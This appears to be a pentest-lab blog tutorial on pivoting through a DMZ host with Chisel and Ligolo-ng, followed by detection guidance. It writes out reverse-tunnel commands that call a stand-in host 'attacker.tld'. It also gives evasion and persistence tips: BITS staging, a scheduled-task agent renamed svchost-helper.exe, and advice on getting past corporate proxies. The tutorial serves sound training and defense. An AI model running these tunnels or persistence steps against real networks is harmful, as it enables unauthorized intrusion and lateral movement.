Pivoting with Chisel and Ligolo-ng: Segmented Networks in a Pentest Lab

Your DMZ shell is worth zero if you cannot reach VLAN 30 where the domain controller breathes. In the Basilisk OffSec lab we built exactly that scenario: a Linux host exposed on 10.10.1.0/24, an internal segment 10.10.30.0/24 with Windows 11, and AD on 10.10.40.0/24. The only viable route runs through that pivot box, and that is where Chisel and Ligolo-ng come in as complementary tools. Before writing a single payload byte, walk through Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite to confirm your lab is firewalled off from your home network through pfSense.

Chisel solves the basic problem: you have HTTP egress to a C2, but ingress is closed. By running a Chisel server on the attacker (chisel server --port 443 --reverse --tls-key key.pem --tls-cert cert.pem) and the client on the pivot (chisel client https://attacker.tld:443 R:1080:socks), you open a reverse SOCKS5 tunneled over TLS 443, which is almost always allowed outbound. In real engagements against Squid and Zscaler corporate proxies, we measured under 8% block rate when the certificate carried a coherent SAN. The pattern has its own noise: long-lived HTTP/1.1 Upgrade connections, exactly the kind of thing JA3 fingerprinting catches.

Ligolo-ng raises the bar because it creates a TUN interface on the attacker and routes whole packets, not just TCP streams through SOCKS. Run the proxy (./proxy -selfcert -laddr 0.0.0.0:11601), execute the agent on the pivot (./agent -connect attacker.tld:11601 -ignore-cert), and inside the proxy shell call ifconfig + tunnel_start. From that point, a plain ip route add 10.10.30.0/24 dev ligolo on Kali lets you run nmap, CrackMapExec, even Impacket without proxychains. Liberating, yes, but the IoC surface grows: you now push ICMP, UDP, and TCP through the pivot, which lines up cleanly with the detection rules covered in Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus.

On the offensive side, the sequence we use in the lab is: initial access via an Office macro documented in Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab, a Sliver beacon as test shell (see Building C2 Infra with Sliver in an Isolated Lab for Defensive Research for the setup), then staging the Ligolo binary through Background Intelligent Transfer Service to dodge direct download. The agent lives in a writable directory like C:\Users\Public\Downloads, persisted as a low-priority scheduled task. Critical detail: compiling the agent with -ldflags="-s -w" and renaming it to svchost-helper.exe will not fool modern EDR; Sysmon Event ID 3 lights up that process reaching an unusual port within seconds when the rule is written right.

On the defensive side, and this is where the exercise turns into purple team gold, you hunt for three things. First, persistent outbound connections to 443/11601 lasting over 30 minutes from hosts that historically only make short Microsoft 365 requests. Second, unsigned processes opening TLS without Wininet or Schannel (Ligolo carries its own Go runtime). Third, TUN/TAP interface creation on Windows endpoints, a rare-enough event to anchor a high-confidence Sigma rule. Wire that into Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule and you have detection-as-code that survives many different pivot shapes.

Logs are your judge. In the lab we captured PCAP on the firewall with Suricata in IDS mode, and the heuristic that caught Ligolo best combined a TLS packet with a non-allowlisted JA3 handshake, an average packet size between 1200 and 1400 bytes, and missing SNI for the destination domain. Chisel hid a bit better because it mimics legit websockets, but it leaked through session duration. To round out the investigation, pull a memory image from the pivot post-incident and cross-reference it with Memory Forensics with Volatility 3: Analyzing Dumps in a Reproducible Lab using the netscan plugin; the socket shows even if the process was injected.

Ethics and scope are not an addendum, they are the foundation. None of this makes sense outside a lab you own, a signed contract, or an authorized range like HackTheBox Pro Labs and OffSec PG Practice. Documenting exact commands, binary hashes, and execution windows protects you and your client. Before deploying Ligolo on a real engagement, revisit your personal posture with OPSEC for Security Researchers: Building a Personal Threat Model and keep your research box separate from your client box. Practical takeaway: stand up the lab today with three VMs and a pfSense, drop Chisel and Ligolo in the same day, and spend the rest of the week writing the Sigma rule that catches yourself. Only then do you really understand the technique.